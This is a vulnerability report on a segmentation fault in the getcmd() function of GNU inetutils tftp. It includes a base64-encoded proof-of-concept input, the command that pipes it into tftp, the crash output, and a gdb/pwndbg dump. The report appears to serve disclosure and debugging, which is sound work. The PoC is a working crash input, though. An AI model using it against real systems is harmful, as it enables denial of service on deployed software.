# Untrusted Pointer Dereference in getcmd() at inetutils/src/tftp.c:878 ## Description
An Untrusted Pointer Dereference was discovered in getcmd() at inetutils/src/tftp.c:878. The vulnerability causes a segmentation fault and application crash. **version** ``` ./tftp --version tftp (GNU inetutils) 2.2.16-cf091 Copyright (C) 2021 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later < https://gnu.org/licenses/gpl.html>. This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Written by many authors. ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz ## Proof of Concept **poc** ``` base64 poc PyA/IGIg/zc/IGIgEMoiICIgEAsgYiDKysogIiAQNyIiIyIgIiAQCyA/IGIgNwQgIP83IyIgIiAQ CyA6uwQvHiIUYiDKysrKPyA/IGIgEMoiICIgEDciIiMiICIgEAsgPyBiIDcEICD/NyMiICIgEAsg OrsELx4iFGIgysrKyj8gPyBiIBDKIiAiIBALIGIgysrKICIpEDciICIgEAsgYiDKysogIiAQNyIi IABAMAsg ``` **command:** ``` ./tftp < ./poc ``` **Result** ``` ./tftp < poc print help information set mode to octet ?Invalid help command �7? set mode to octet ?Invalid help command �" ?Invalid help command " ?Invalid help command set mode to octet ?Invalid help command ��� ?Invalid help command " ?Invalid help command 7""#" ?Invalid help command " ?Invalid help command print help information set mode to octet ?Invalid help command 7 ?Invalid help command �7#" ?Invalid help command " ?Invalid help command ?Invalid help command :� / " b ?Invalid help command ����? print help information set mode to octet ?Invalid help command �" ?Invalid help command " ?Invalid help command 7""#" ?Invalid help command " ?Invalid help command print help information set mode to octet ?Invalid help command 7 ?Invalid help command �7#" ?Invalid help command " ?Invalid help command ?Invalid help command :� / " b ?Invalid help command ����? print help information set mode to octet ?Invalid help command �" ?Invalid help command " ?Invalid help command set mode to octet ?Invalid help command ��� ?Invalid help command ") 7" ?Invalid help command " ?Invalid help command set mode to octet ?Invalid help command ��� ?Invalid help command " [1] 1736392 segmentation fault ./tftp < poc ``` **gdb** ``` Program received signal SIGSEGV, Segmentation fault. 0x0000555555558bc4 in getcmd (name=0x555500000033 <error: Cannot access memory at address 0x555500000033>) at tftp.c:878 878 for (c = cmdtab; (p = c->name) != NULL; c++) LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x18 RBX 0x555555567b50 (margc) ◂— 0x555500000033 /* '3' */ RCX 0x0 RDX 0x0 RDI 0x555500000033 RSI 0x55555556258c ◂— 0x7463656e6e6f63 /* 'connect' */ R8 0x0 R9 0x18 R10 0x55555556243b ◂— 0x203a70746674000a /* '\n' */ R11 0x246 R12 0x555500000033 R13 0x555555562423 ◂— '?Invalid help command %s\n' R14 0x0 R15 0x0 RBP 0x555555567b50 (margc) ◂— 0x555500000033 /* '3' */ RSP 0x7fffffffe138 —▸ 0x555555558cce (help+78) ◂— cmp rax, -1 RIP 0x555555558bc4 (getcmd+20) ◂— movzx r9d, byte ptr [rdi] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x555555558bc4 <getcmd+20> movzx r9d, byte ptr [rdi] 0x555555558bc8 <getcmd+24> push rbx 0x555555558bc9 <getcmd+25> xor r11d, r11d 0x555555558bcc <getcmd+28> xor r10d, r10d 0x555555558bcf <getcmd+31> xor ebx, ebx 0x555555558bd1 <getcmd+33> lea r8, [rip + 0xe7c8] <0x5555555673a0> 0x555555558bd8 <getcmd+40> lea rcx, [rsi + 1] 0x555555558bdc <getcmd+44> mov rdx, rdi 0x555555558bdf <getcmd+47> mov eax, r9d 0x555555558be2 <getcmd+50> cmp byte ptr [rsi], r9b 0x555555558be5 <getcmd+53> je getcmd+80 <getcmd+80> ──────────────────────────────────────────[ SOURCE (CODE) ]─────────────────────────────────────────── In file: /home/aidai/fuzzing/inetutils/inetutils/src/tftp.c 873 register int nmatches, longest; 874 875 longest = 0; 876 nmatches = 0; 877 found = 0; ► 878 for (c = cmdtab; (p = c->name) != NULL; c++) 879 { 880 for (q = name; *q == *p++; q++) 881 if (*q == 0) /* exact match? */ 882 return (c); 883 ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffffe138 —▸ 0x555555558cce (help+78) ◂— cmp rax, -1 01:0008│ 0x7fffffffe140 —▸ 0x55555556b710 ◂— 0x0 02:0010│ 0x7fffffffe148 —▸ 0x5555555610f0 (__libc_csu_init) ◂— endbr64 03:0018│ 0x7fffffffe150 ◂— 0x33 /* '3' */ 04:0020│ 0x7fffffffe158 —▸ 0x5555555679c0 (margv) —▸ 0x555555567b80 (line) ◂— 0x37ff0062003f003f /* '?' */ 05:0028│ 0x7fffffffe160 —▸ 0x7fffffffe270 ◂— 0x1 06:0030│ 0x7fffffffe168 —▸ 0x555555557b83 (main+387) ◂— jmp 0x555555557b29 07:0038│ 0x7fffffffe170 —▸ 0x7fffffffe270 ◂— 0x1 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x555555558bc4 getcmd+20 f 1 0x555555558cce help+78 f 2 0x555555557b83 main+387 f 3 0x555555557b83 main+387 f 4 0x7ffff7de70b3 __libc_start_main+243 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x0000555555558bc4 in getcmd (name=0x555500000033 <error: Cannot access memory at address 0x555500000033>) at tftp.c:878 #1 0x0000555555558cce in help (argc=<optimized out>, argv=0x555555567b50 <margc>) at tftp.c:955 #2 0x0000555555557b83 in command () at tftp.c:864 #3 main (argc=argc@entry=1, argv=argv@entry=0x7fffffffe278) at tftp.c:298 #4 0x00007ffff7de70b3 in __libc_start_main (main=0x555555557a00 <main>, argc=1, argv=0x7fffffffe278, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe268) at ../csu/libc-start.c:308 #5 0x0000555555557c0e in _start () at /usr/include/x86_64-linux-gnu/bits/stdio2.h:107 ```